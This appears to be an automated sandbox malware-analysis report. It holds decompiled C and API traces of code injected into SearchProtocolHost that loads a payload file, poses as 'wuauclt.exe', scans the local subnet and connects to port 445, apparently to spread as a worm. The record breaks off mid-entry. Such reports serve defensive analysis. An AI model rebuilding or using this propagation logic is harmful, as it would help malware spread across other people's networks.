                                                • Not Executed
                                                control_flow_graph 235 2fa49e0-2fa4a0e CreateFileA 236 2fa4a48-2fa4a50 235->236 237 2fa4a10-2fa4a3f GetFileSizeEx LocalAlloc 235->237 238 2fa4a51-2fa4a5e 237->238 239 2fa4a41-2fa4a42 CloseHandle 237->239 240 2fa4a8c-2fa4a8f 238->240 241 2fa4a60-2fa4a7c ReadFile 238->241 239->236 242 2fa4aab-2fa4ab9 FindCloseChangeNotification 240->242 243 2fa4a91-2fa4aaa CloseHandle LocalFree 240->243 244 2fa4a89 241->244 245 2fa4a7e-2fa4a87 241->245 244->240 245->241 245->244
                                                C-Code - Quality: 67%
                                                			E02FA49E0(void** __edx, struct _OVERLAPPED** _a4) {
                                                				void** _v12;
                                                				long _v16;
                                                				long _v20;
                                                				struct _OVERLAPPED* _v28;
                                                				long _v32;
                                                				void* _t15;
                                                				void* _t18;
                                                				long _t19;
                                                				long _t27;
                                                				void* _t29;
                                                				void** _t30;
                                                				struct _OVERLAPPED** _t33;
                                                				long _t34;
                                                
                                                				_v12 = __edx;
                                                				_t15 = CreateFileA("C:\\Windows\\system32\\msvcwme.log", 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                                				_t29 = _t15;
                                                				if(_t29 == 0xffffffff) {
                                                					L3:
                                                					return 0;
                                                				} else {
                                                					_v32 = 0;
                                                					_v28 = 0;
                                                					__imp__GetFileSizeEx(_t29,  &_v32);
                                                					_t34 = _v32;
                                                					_v20 = _t34;
                                                					_t18 = LocalAlloc(0x40, _t34); // executed
                                                					_t30 = _v12;
                                                					 *_t30 = _t18;
                                                					if(_t18 != 0) {
                                                						_t33 = _a4;
                                                						_t19 = _t34;
                                                						 *_t33 = 0;
                                                						if(_t19 > 0) {
                                                							while(1) {
                                                								_v16 = 0;
                                                								ReadFile(_t29,  *_t30, _t34,  &_v16, 0); // executed
                                                								_t27 = _v16;
                                                								if(_t27 == 0) {
                                                									break;
                                                								}
                                                								 *_t33 =  *_t33 + _t27;
                                                								_t34 = _t34 - _t27;
                                                								_t30 = _v12;
                                                								if(_t34 > 0) {
                                                									continue;
                                                								}
                                                								break;
                                                							}
                                                							_t19 = _v20;
                                                						}
                                                						_push(_t29);
                                                						if( *_t33 == _t19) {
                                                							FindCloseChangeNotification(); // executed
                                                							return 1;
                                                						} else {
                                                							CloseHandle();
                                                							LocalFree( *_v12);
                                                							return 0; // executed
                                                						}
                                                					} else {
                                                						CloseHandle(_t29);
                                                						goto L3;
                                                					}
                                                				}
                                                			}

















                                                APIs
                                                • CreateFileA.KERNELBASE(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000080,00000000,?,73B76490,?,?,?,?,02FA4AE6,?), ref: 02FA4A03
                                                • GetFileSizeEx.KERNEL32(00000000,?,?,73B76490), ref: 02FA4A23
                                                • LocalAlloc.KERNELBASE(00000040,00000000,?,73B76490), ref: 02FA4A32
                                                • CloseHandle.KERNEL32(00000000,?,73B76490), ref: 02FA4A42
                                                • ReadFile.KERNELBASE(00000000,73B76490,00000000,?,00000000,?,73B76490), ref: 02FA4A71
                                                • CloseHandle.KERNEL32(00000000,?,73B76490), ref: 02FA4A91
                                                • LocalFree.KERNEL32(73B76490,?,73B76490), ref: 02FA4A9C
                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,73B76490), ref: 02FA4AAB
                                                Strings
                                                • C:\Windows\system32\msvcwme.log, xrefs: 02FA49FB
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: CloseFile$HandleLocal$AllocChangeCreateFindFreeNotificationReadSize
                                                • String ID: C:\Windows\system32\msvcwme.log
                                                • API String ID: 4148216468-2357825738
                                                • Opcode ID: 0b0d3d7437a80b0a372e227bc3569d17712cc191089b1eb54cc8da082e39fcd4
                                                • Instruction ID: 5fadf911a7062ea6238e68a9ecfbe3bd086730fd89f07afd3f108b6fd72a34a8
                                                • Opcode Fuzzy Hash: 0b0d3d7437a80b0a372e227bc3569d17712cc191089b1eb54cc8da082e39fcd4
                                                • Instruction Fuzzy Hash: FC21E575E40209ABEB108FA5DC49BAEFBB8EB08791F600155FA06F7380D7B06411CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 38%
                                                			E02FA9310() {
                                                				signed int _v8;
                                                				signed int _v16;
                                                				char _v20;
                                                				intOrPtr _v24;
                                                				intOrPtr _v28;
                                                				intOrPtr _v32;
                                                				char _v48;
                                                				char _v444;
                                                				void* __esi;
                                                				signed int _t12;
                                                				void* _t16;
                                                				signed int _t18;
                                                				void* _t29;
                                                				void* _t30;
                                                				void* _t31;
                                                				void* _t32;
                                                				signed int _t33;
                                                
                                                				_t35 = (_t33 & 0xfffffff8) - 0x1bc;
                                                				_t12 =  *0x2fcf008; // 0x93ad1eea
                                                				_v8 = _t12 ^ (_t33 & 0xfffffff8) - 0x000001bc;
                                                				__imp__#115(0x202,  &_v444, _t29); // executed
                                                				asm("movaps xmm0, [0x2fccf90]");
                                                				asm("movups [esp+0x1a8], xmm0");
                                                				_v32 = 0x2d383132;
                                                				_v28 = 0x44383732;
                                                				_v24 = 0x7d454536;
                                                				_v20 = 0;
                                                				_t16 = CreateMutexA(0, 1,  &_v48); // executed
                                                				_t30 = _t16;
                                                				_t18 = GetLastError() & 0xffffff00 | _t17 == 0x000000b7;
                                                				if(_t30 == 0) {
                                                					L3:
                                                					_pop(_t31);
                                                					_t10 =  &_v16; // 0x2d383132
                                                					return E02FB0A5D( *_t10 ^ _t35, _t31);
                                                				} else {
                                                					if(_t18 == 0) {
                                                						_pop(_t32);
                                                						return E02FB0A5D(_v16 ^ _t35, _t32);
                                                					} else {
                                                						ReleaseMutex(_t30);
                                                						CloseHandle(_t30);
                                                						goto L3;
                                                					}
                                                				}
                                                			}





















                                                APIs
                                                • WSAStartup.WS2_32(00000202,?), ref: 02FA9335
                                                • CreateMutexA.KERNELBASE ref: 02FA937F
                                                • GetLastError.KERNEL32 ref: 02FA9387
                                                • ReleaseMutex.KERNEL32(00000000), ref: 02FA939E
                                                • CloseHandle.KERNEL32(00000000), ref: 02FA93A5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: Mutex$CloseCreateErrorHandleLastReleaseStartup
                                                • String ID: 218-$278D$6EE}
                                                • API String ID: 2916891069-3960941272
                                                • Opcode ID: bce6e45142019450440d93b2a6af2e15160849543c7df81c204337b147ce181a
                                                • Instruction ID: 5ad1cc324c400ef490101338cd0918b24b771b331f430d5a7391a580ce037f22
                                                • Opcode Fuzzy Hash: bce6e45142019450440d93b2a6af2e15160849543c7df81c204337b147ce181a
                                                • Instruction Fuzzy Hash: EB11C2718883488BD7309B20E9097EAF7E8FF86750F90090DE98D9B280DB716455CBC3
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 84%
                                                			E02FA6D40() {
                                                				signed int _v8;
                                                				char _v9;
                                                				short _v11;
                                                				char _v15;
                                                				char _v40;
                                                				char _v300;
                                                				char _v560;
                                                				signed int _t18;
                                                				signed char _t29;
                                                				signed int _t30;
                                                				intOrPtr* _t31;
                                                				void* _t35;
                                                				signed char _t47;
                                                				intOrPtr _t51;
                                                				void* _t54;
                                                				void* _t56;
                                                				void* _t57;
                                                				intOrPtr* _t59;
                                                				signed int _t60;
                                                				void* _t61;
                                                				void* _t63;
                                                
                                                				_t18 =  *0x2fcf008; // 0x93ad1eea
                                                				_v8 = _t18 ^ _t60;
                                                				_push(_t56);
                                                				E02FB3440(_t56,  &_v300, 0, 0x104);
                                                				E02FB3440(_t56,  &_v560, 0, 0x104);
                                                				GetWindowsDirectoryA( &_v560, 0x104);
                                                				_push("NetworkDistribution");
                                                				E02FA5180( &_v300, 0x104, "%s\\%s\\",  &_v560);
                                                				_t63 = _t61 + 0x2c;
                                                				_t29 = E02FA6FE0(1,  &_v300, _t56); // executed
                                                				_t57 = Sleep;
                                                				asm("sbb bl, bl");
                                                				_t47 =  ~_t29 &  ~_t29;
                                                				while(1) {
                                                					asm("xorps xmm0, xmm0");
                                                					_v40 = 0;
                                                					asm("movups [ebp-0x23], xmm0");
                                                					_t59 = 0;
                                                					_v15 = 0;
                                                					asm("movq [ebp-0x13], xmm0");
                                                					_v11 = 0;
                                                					_v9 = 0;
                                                					EnterCriticalSection(0x2fd6a5c);
                                                					_t30 =  *0x2fd5ba0;
                                                					if(_t30 != 0) {
                                                						_t49 =  *0x2fd5b9c;
                                                						_t38 = _t30 - 1;
                                                						_t59 =  *((intOrPtr*)( *0x2fd5b9c));
                                                						 *0x2fd5ba0 = _t30 - 1;
                                                						E02FB1920( *0x2fd5b9c, _t49 + 4, _t38 << 2);
                                                						_t63 = _t63 + 0xc;
                                                						E02FA6EF0(0x2fd5b80);
                                                					}
                                                					L3:
                                                					LeaveCriticalSection(0x2fd6a5c);
                                                					if(_t59 == 0) {
                                                						Sleep(0x64);
                                                						continue;
                                                						do {
                                                							while(1) {
                                                								asm("xorps xmm0, xmm0");
                                                								_v40 = 0;
                                                								asm("movups [ebp-0x23], xmm0");
                                                								_t59 = 0;
                                                								_v15 = 0;
                                                								asm("movq [ebp-0x13], xmm0");
                                                								_v11 = 0;
                                                								_v9 = 0;
                                                								EnterCriticalSection(0x2fd6a5c);
                                                								_t30 =  *0x2fd5ba0;
                                                								if(_t30 != 0) {
                                                									_t49 =  *0x2fd5b9c;
                                                									_t38 = _t30 - 1;
                                                									_t59 =  *((intOrPtr*)( *0x2fd5b9c));
                                                									 *0x2fd5ba0 = _t30 - 1;
                                                									E02FB1920( *0x2fd5b9c, _t49 + 4, _t38 << 2);
                                                									_t63 = _t63 + 0xc;
                                                									E02FA6EF0(0x2fd5b80);
                                                								}
                                                								goto L3;
                                                							}
                                                							L9:
                                                							_t35 = E02FA7720(_t47,  &_v40,  &_v300, _t57, _t59, _t70);
                                                							_t71 = _t35;
                                                						} while (_t35 != 0);
                                                						L10:
                                                						if(E02FAB070( &_v40, _t71) == 0) {
                                                							Sleep(0xa);
                                                						}
                                                						continue;
                                                					}
                                                					_t31 = _t59;
                                                					_t13 = _t31 + 1; // 0x1
                                                					_t54 = _t13;
                                                					do {
                                                						_t51 =  *_t31;
                                                						_t31 = _t31 + 1;
                                                					} while (_t51 != 0);
                                                					if(_t31 - _t54 > 4) {
                                                						E02FB5C70( &_v40, 0x20, _t59);
                                                						_t63 = _t63 + 0xc;
                                                					}
                                                					_push(0x2c);
                                                					E02FB0AA1(_t59);
                                                					_t63 = _t63 + 8;
                                                					_t70 = _t47;
                                                					if(_t47 == 0) {
                                                						goto L10;
                                                					} else {
                                                						goto L9;
                                                					}
                                                				}
                                                			}

























                                                APIs
                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 02FA6D8D
                                                  • Part of subcall function 02FA6FE0: CreateFileA.KERNELBASE(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02FA703C
                                                  • Part of subcall function 02FA6FE0: FindCloseChangeNotification.KERNELBASE(00000000), ref: 02FA704C
                                                  • Part of subcall function 02FA6FE0: CreateDirectoryA.KERNELBASE(?,00000000), ref: 02FA7055
                                                  • Part of subcall function 02FA6FE0: DeleteFileA.KERNEL32(?), ref: 02FA7093
                                                • EnterCriticalSection.KERNEL32(02FD6A5C), ref: 02FA6DF9
                                                • LeaveCriticalSection.KERNEL32(02FD6A5C), ref: 02FA6E36
                                                • Sleep.KERNEL32(0000000A), ref: 02FA6E99
                                                • Sleep.KERNEL32(00000064), ref: 02FA6EA2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: CreateCriticalDirectoryFileSectionSleep$ChangeCloseDeleteEnterFindLeaveNotificationWindows
                                                • String ID: %s\%s\$NetworkDistribution
                                                • API String ID: 2690460970-574155335
                                                • Opcode ID: b49a616d41f81b74d9239b0805e22bd4a07c01e529d949909593e1ddb2542975
                                                • Instruction ID: 5ede488a9d2bfbf22a2898e08afac7482df4f0c768cb9026d2da484213193be2
                                                • Opcode Fuzzy Hash: b49a616d41f81b74d9239b0805e22bd4a07c01e529d949909593e1ddb2542975
                                                • Instruction Fuzzy Hash: CB31F7B1D81218AAEB10EBB0DC55FDEB369AF057C4F544054E745F7140EB71A6448B90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 82%
                                                			E02FA4AC0(void* __ecx, intOrPtr __edx, void** _a4, long* _a8) {
                                                				void* _v8;
                                                				long _v12;
                                                				signed int _v16;
                                                				char _v20;
                                                				intOrPtr _v24;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* _t44;
                                                				intOrPtr* _t47;
                                                				long _t51;
                                                				void* _t52;
                                                				long _t61;
                                                				long _t62;
                                                				void* _t63;
                                                				long _t66;
                                                				void* _t78;
                                                				void* _t79;
                                                				long* _t80;
                                                				long _t87;
                                                				intOrPtr _t89;
                                                				intOrPtr* _t90;
                                                				void* _t92;
                                                				void* _t93;
                                                
                                                				_v24 = __edx;
                                                				_v8 = 0;
                                                				_v12 = 0;
                                                				_t44 = E02FA49E0( &_v8,  &_v12); // executed
                                                				_t93 = _t92 + 4;
                                                				if(_t44 != 0) {
                                                					_t87 = _v12;
                                                					_t78 = 0;
                                                					_v16 = 0;
                                                					__eflags = _t87;
                                                					if(__eflags <= 0) {
                                                						L10:
                                                						LocalFree(_v8); // executed
                                                						return _v16;
                                                					} else {
                                                						while(1) {
                                                							_t47 = E02FB0A6E(_t90, __eflags, 0x58); // executed
                                                							_t90 = _t47;
                                                							_v20 = _t90;
                                                							_v20 = _t90;
                                                							E02FB3440(_t87, _t90, 0, 0x58);
                                                							_t93 = _t93 + 0x10;
                                                							asm("movups xmm0, [ebx+eax]");
                                                							asm("movups [esi], xmm0");
                                                							asm("movups xmm0, [ebx+eax+0x10]");
                                                							asm("movups [esi+0x10], xmm0");
                                                							asm("movups xmm0, [ebx+eax+0x20]");
                                                							asm("movups [esi+0x20], xmm0");
                                                							asm("movups xmm0, [ebx+eax+0x30]");
                                                							asm("movups [esi+0x30], xmm0");
                                                							asm("movups xmm0, [ebx+eax+0x40]");
                                                							_t79 = _t78 + 0x50;
                                                							asm("movups [esi+0x40], xmm0");
                                                							__eflags =  *_t90 - _v24;
                                                							if( *_t90 == _v24) {
                                                								break;
                                                							}
                                                							_t78 = _t79 +  *(_t90 + 0x38) +  *(_t90 + 0xc);
                                                							__eflags = _t78 - _t87;
                                                							if(__eflags < 0) {
                                                								continue;
                                                							} else {
                                                								LocalFree(_v8);
                                                								return _v16;
                                                							}
                                                							goto L11;
                                                						}
                                                						_t51 =  *(_t90 + 0xc);
                                                						_v12 = _t51;
                                                						_t52 = LocalAlloc(0x40, _t51); // executed
                                                						 *(_t90 + 0x50) = _t52;
                                                						 *((intOrPtr*)(_t90 + 0x54)) = LocalAlloc(0x40,  *(_t90 + 0x38));
                                                						E02FC3DB0( *(_t90 + 0x50), _v8 + _t79, _v12);
                                                						E02FC3DB0( *((intOrPtr*)(_t90 + 0x54)), _v12 + _t79 + _v8,  *(_t90 + 0x38));
                                                						_t61 = E02FA48B0( &_v20);
                                                						__eflags = _t61;
                                                						if(_t61 == 0) {
                                                							goto L10;
                                                						} else {
                                                							_t89 = _v20;
                                                							_t80 = _a8;
                                                							_t62 =  *(_t89 + 8);
                                                							 *_t80 = _t62; // executed
                                                							_t63 = LocalAlloc(0x40, _t62); // executed
                                                							 *_a4 = _t63;
                                                							E02FB3440(_t89, _t63, 0,  *(_t89 + 8));
                                                							_t66 = E02FA1000(_t63, _t80,  *((intOrPtr*)(_t89 + 0x50)), _v12);
                                                							__eflags = _t66;
                                                							if(_t66 == 0) {
                                                								__eflags =  *_t80 -  *(_t89 + 8);
                                                								_t69 =  ==  ? 1 : _v16 & 0x000000ff;
                                                								_v16 =  ==  ? 1 : _v16 & 0x000000ff;
                                                								goto L10;
                                                							} else {
                                                								LocalFree( *_a4);
                                                								LocalFree(_v8);
                                                								return _v16;
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					return _t44;
                                                				}
                                                				L11:
                                                			}


                                                APIs
                                                  • Part of subcall function 02FA49E0: CreateFileA.KERNELBASE(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000080,00000000,?,73B76490,?,?,?,?,02FA4AE6,?), ref: 02FA4A03
                                                  • Part of subcall function 02FA49E0: GetFileSizeEx.KERNEL32(00000000,?,?,73B76490), ref: 02FA4A23
                                                  • Part of subcall function 02FA49E0: LocalAlloc.KERNELBASE(00000040,00000000,?,73B76490), ref: 02FA4A32
                                                  • Part of subcall function 02FA49E0: CloseHandle.KERNEL32(00000000,?,73B76490), ref: 02FA4A42
                                                • new.LIBCMT ref: 02FA4B07
                                                • LocalFree.KERNEL32(00000000), ref: 02FA4B6B
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: FileLocal$AllocCloseCreateFreeHandleSize
                                                • String ID:
                                                • API String ID: 1503672127-0
                                                • Opcode ID: 3205dbfe04945cc9f4075071335e1ca5ef35dd0e3e57b1571629aff60a28955c
                                                • Instruction ID: d822e1b04bd36b3b12a9bf79f2f7126292166a3c16820afc5dc02fc33e5de8fc
                                                • Opcode Fuzzy Hash: 3205dbfe04945cc9f4075071335e1ca5ef35dd0e3e57b1571629aff60a28955c
                                                • Instruction Fuzzy Hash: D151F375D00708ABDB11DFA8DD45AEEFBB0FF48358F144594EE49A3201E771AA94CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 100%
                                                			E02FAAFC0() {
                                                				void* __edi;
                                                				void* _t7;
                                                				void* _t9;
                                                				signed int _t14;
                                                				signed int _t15;
                                                				void* _t18;
                                                				void* _t19;
                                                
                                                				Sleep(0xbb8); // executed
                                                				_t7 = 0;
                                                				do {
                                                					_t1 = _t7 + L"wuauclt.exe"; // 0x750077
                                                					_t14 =  *_t1 & 0x0000ffff;
                                                					_t7 = _t7 + 2;
                                                					 *(_t7 + 0x2fd6836) = _t14;
                                                					_t22 = _t14;
                                                				} while (_t14 != 0);
                                                				E02FA9D90(_t22);
                                                				_t9 = E02FAAE20(_t14, _t18, _t22);
                                                				if(_t9 != 0) {
                                                					while(1) {
                                                						L4:
                                                						EnterCriticalSection(0x2fd5bfc);
                                                						_t15 =  *0x2fd5c18;
                                                						if(_t15 == 0) {
                                                							break;
                                                						}
                                                						_t19 =  *( *0x2fd5c14 + _t15 * 4 - 4);
                                                						 *0x2fd5c18 = _t15 - 1;
                                                						E02FA6EF0(0x2fd5bf8);
                                                						if(_t19 != 0) {
                                                							CreateThread(0, 0, E02FAAD60, _t19, 0, 0);
                                                						}
                                                						LeaveCriticalSection(0x2fd5bfc);
                                                						Sleep(0x64);
                                                					}
                                                					LeaveCriticalSection(0x2fd5bfc);
                                                					Sleep(0xbb8);
                                                					Sleep(0x64);
                                                					goto L4;
                                                				}
                                                				return _t9;
                                                			}


                                                APIs
                                                • Sleep.KERNELBASE(00000BB8), ref: 02FAAFCE
                                                • EnterCriticalSection.KERNEL32(02FD5BFC), ref: 02FAB005
                                                • CreateThread.KERNEL32(00000000,00000000,02FAAD60,?,00000000,00000000), ref: 02FAB041
                                                • LeaveCriticalSection.KERNEL32(02FD5BFC), ref: 02FAB04C
                                                • Sleep.KERNEL32(00000064), ref: 02FAB050
                                                • LeaveCriticalSection.KERNEL32(02FD5BFC), ref: 02FAB059
                                                • Sleep.KERNEL32(00000BB8), ref: 02FAB060
                                                • Sleep.KERNEL32(00000064), ref: 02FAB064
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: Sleep$CriticalSection$Leave$CreateEnterThread
                                                • String ID:
                                                • API String ID: 2546236395-0
                                                • Opcode ID: 5885f4980c2cf54dee3bceaa398a83ccedf6fd8ae9546d56fb4ecf1558e187d8
                                                • Instruction ID: 2340469e68bd2a1fe92ac00d987a4d068667fd792d74a7b6ea5cc515885cd63d
                                                • Opcode Fuzzy Hash: 5885f4980c2cf54dee3bceaa398a83ccedf6fd8ae9546d56fb4ecf1558e187d8
                                                • Instruction Fuzzy Hash: 210144B1BC430C9AEA206BA4DC66F2D7762EF44FC4F580409A3069B180CBA1A480CBB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • socket.WS2_32(00000002,00000001,00000006), ref: 02FAB33A
                                                • inet_addr.WS2_32(?), ref: 02FAB351
                                                • htons.WS2_32(000001BD), ref: 02FAB35F
                                                • connect.WS2_32(00000000,?,00000010), ref: 02FAB370
                                                • closesocket.WS2_32(00000000), ref: 02FAB37C
                                                • closesocket.WS2_32(00000000), ref: 02FAB394
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: closesocket$connecthtonsinet_addrsocket
                                                • String ID:
                                                • API String ID: 279130052-0
                                                • Opcode ID: 70aa75d4805e6738f121fc1fd1f33ae2ac18133ba646a5e316d2eacee0c09eab
                                                • Instruction ID: eaee8fd73f55f7e25853c2aff509319cf2b497980cc05f1249beaae8ec739048
                                                • Opcode Fuzzy Hash: 70aa75d4805e6738f121fc1fd1f33ae2ac18133ba646a5e316d2eacee0c09eab
                                                • Instruction Fuzzy Hash: 1F110834E4020CABCB10AFB4ED09AEEF3B8FF46360F60065AE915AB2C0DB7159118791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • socket.WS2_32(00000002,00000001,00000006), ref: 02FAB2AD
                                                • inet_addr.WS2_32(?), ref: 02FAB2C4
                                                • htons.WS2_32(0000DEFC), ref: 02FAB2CE
                                                • connect.WS2_32(00000000,?,00000010), ref: 02FAB2DF
                                                • closesocket.WS2_32(00000000), ref: 02FAB2EB
                                                • closesocket.WS2_32(00000000), ref: 02FAB304
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: closesocket$connecthtonsinet_addrsocket
                                                • String ID:
                                                • API String ID: 279130052-0
                                                • Opcode ID: 03e82904dad8b8fd3d9cb903762ee8104f5b15c9f2f916f053165ecf6cc59039
                                                • Instruction ID: 8e39eac73202a1dd82d6523187023862cfd91df38c31a210dceaab573311ea7e
                                                • Opcode Fuzzy Hash: 03e82904dad8b8fd3d9cb903762ee8104f5b15c9f2f916f053165ecf6cc59039
                                                • Instruction Fuzzy Hash: 50010831E4020CABCB10AFB9A949AEEF3F8FF49361F50066AE915A7280DA3159108790
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 483 2fa7c20-2fa7c4d 484 2fa7c53-2fa7c8c call 2fb3440 gethostname gethostbyname 483->484 487 2fa7c8e-2fa7c95 Sleep 484->487 488 2fa7c97-2fa7cb4 484->488 487->484 489 2fa7cba-2fa7cbc 488->489 490 2fa7ddf-2fa7de6 Sleep 488->490 491 2fa7cc0-2fa7d16 call 2fa5180 489->491 490->484 494 2fa7d18-2fa7d1a 491->494 495 2fa7d1c-2fa7d1f 491->495 496 2fa7d2b-2fa7d64 call 2fa5a00 call 2fa7df0 494->496 497 2fa7d22-2fa7d27 495->497 503 2fa7d73-2fa7d98 call 2fab4e0 496->503 504 2fa7d66-2fa7d6e call 2fa5cf0 496->504 497->497 498 2fa7d29 497->498 498->496 507 2fa7d9d-2fa7dac 503->507 504->503 508 2fa7dd9 507->508 509 2fa7dae-2fa7dd3 507->509 508->490 509->491 509->508
                                                C-Code - Quality: 63%
                                                			E02FA7C20() {
                                                				char _v8;
                                                				char _v16;
                                                				signed int _v20;
                                                				char _v21;
                                                				short _v23;
                                                				char _v27;
                                                				char _v52;
                                                				char _v308;
                                                				intOrPtr _v312;
                                                				char _v316;
                                                				char _v332;
                                                				signed int _v336;
                                                				signed int _t43;
                                                				signed int _t44;
                                                				intOrPtr* _t50;
                                                				signed char* _t52;
                                                				signed int _t53;
                                                				intOrPtr* _t56;
                                                				void* _t57;
                                                				intOrPtr* _t61;
                                                				signed int _t67;
                                                				signed char* _t68;
                                                				void* _t71;
                                                				intOrPtr _t73;
                                                				signed char** _t77;
                                                				signed int _t78;
                                                				void* _t81;
                                                				signed int _t82;
                                                				intOrPtr* _t84;
                                                				signed int _t85;
                                                				void* _t86;
                                                				void* _t87;
                                                				void* _t88;
                                                
                                                				_push(0xffffffff);
                                                				_push(E02FC467B);
                                                				_push( *[fs:0x0]);
                                                				_t87 = _t86 - 0x140;
                                                				_t43 =  *0x2fcf008; // 0x93ad1eea
                                                				_t44 = _t43 ^ _t85;
                                                				_v20 = _t44;
                                                				_push(_t44);
                                                				 *[fs:0x0] =  &_v16;
                                                				_t81 = Sleep;
                                                				while(1) {
                                                					L1:
                                                					E02FB3440(_t81,  &_v308, 0, 0x100);
                                                					_t87 = _t87 + 0xc;
                                                					gethostname( &_v308, 0x100); // executed
                                                					_t50 =  &_v308;
                                                					__imp__#52(_t50); // executed
                                                					_t84 = _t50;
                                                					if(_t84 == 0) {
                                                						break;
                                                					}
                                                					_v336 = 0;
                                                					_t52 =  *( *(_t84 + 0xc));
                                                					_t72 =  *_t52 & 0x000000ff;
                                                					_t78 = _t52[1] & 0x000000ff;
                                                					_t53 = _t52[2] & 0x000000ff;
                                                					if(( *_t52 & 0x000000ff) == 0x7f) {
                                                						L15:
                                                						Sleep(0xdbba0); // executed
                                                						continue;
                                                					}
                                                					_t82 = 0;
                                                					do {
                                                						_push(_t53);
                                                						_push(_t78);
                                                						asm("xorps xmm0, xmm0");
                                                						_v52 = 0;
                                                						asm("movq [ebp-0x1f], xmm0");
                                                						asm("movups [ebp-0x2f], xmm0");
                                                						_v27 = 0;
                                                						_v23 = 0;
                                                						_v21 = 0;
                                                						E02FA5180( &_v52, 0x20, "%d.%d.%d.*", _t72);
                                                						_t88 = _t87 + 0x18;
                                                						_v312 = 0xf;
                                                						_v316 = 0;
                                                						_v332 = 0;
                                                						if(_v52 != 0) {
                                                							_t56 =  &_v52;
                                                							_t20 = _t56 + 1; // 0x1
                                                							_t78 = _t20;
                                                							do {
                                                								_t73 =  *_t56;
                                                								_t56 = _t56 + 1;
                                                							} while (_t73 != 0);
                                                							_t57 = _t56 - _t78;
                                                							L10:
                                                							_push(_t57);
                                                							_push( &_v52);
                                                							E02FA5A00(_t71,  &_v332, _t82, _t84);
                                                							_v8 = 0;
                                                							_t61 = E02FA7DF0( &_v332,  &_v332);
                                                							_v8 = 0xffffffff;
                                                							 *_t61 = 0;
                                                							_t62 = _v312;
                                                							if(_v312 >= 0x10) {
                                                								E02FA5CF0(_t71, _t78, _t82, _v332, _t62 + 1);
                                                							}
                                                							_v312 = 0xf;
                                                							_v316 = 0;
                                                							_v332 = 0;
                                                							E02FAB4E0(_t71,  *((intOrPtr*)( *(_t84 + 0xc) + _t82)), 1, _t82, 0); // executed
                                                							_t77 =  *(_t84 + 0xc);
                                                							_t87 = _t88 + 4;
                                                							if( *((short*)(_t84 + 0xa)) +  *(_t77 + _t82) >=  *_t84) {
                                                								break;
                                                							} else {
                                                								goto L13;
                                                							}
                                                						}
                                                						_t57 = 0;
                                                						goto L10;
                                                						L13:
                                                						_t67 = _v336 + 1;
                                                						_v336 = _t67;
                                                						_t82 = _t67 * 4;
                                                						_t68 =  *(_t77 + _t82);
                                                						_t72 =  *_t68 & 0x000000ff;
                                                						_t78 = _t68[1] & 0x000000ff;
                                                						_t53 = _t68[2] & 0x000000ff;
                                                					} while (( *_t68 & 0x000000ff) != 0x7f);
                                                					_t81 = Sleep;
                                                					goto L15;
                                                				}
                                                				Sleep(0x2bf20);
                                                				goto L1;
                                                			}





































                                                APIs
                                                • gethostname.WS2_32(?,00000100), ref: 02FA7C75
                                                • gethostbyname.WS2_32(?), ref: 02FA7C82
                                                • Sleep.KERNEL32(0002BF20), ref: 02FA7C93
                                                • Sleep.KERNELBASE(000DBBA0), ref: 02FA7DE4
                                                Strings
                                                Memory Dump Source
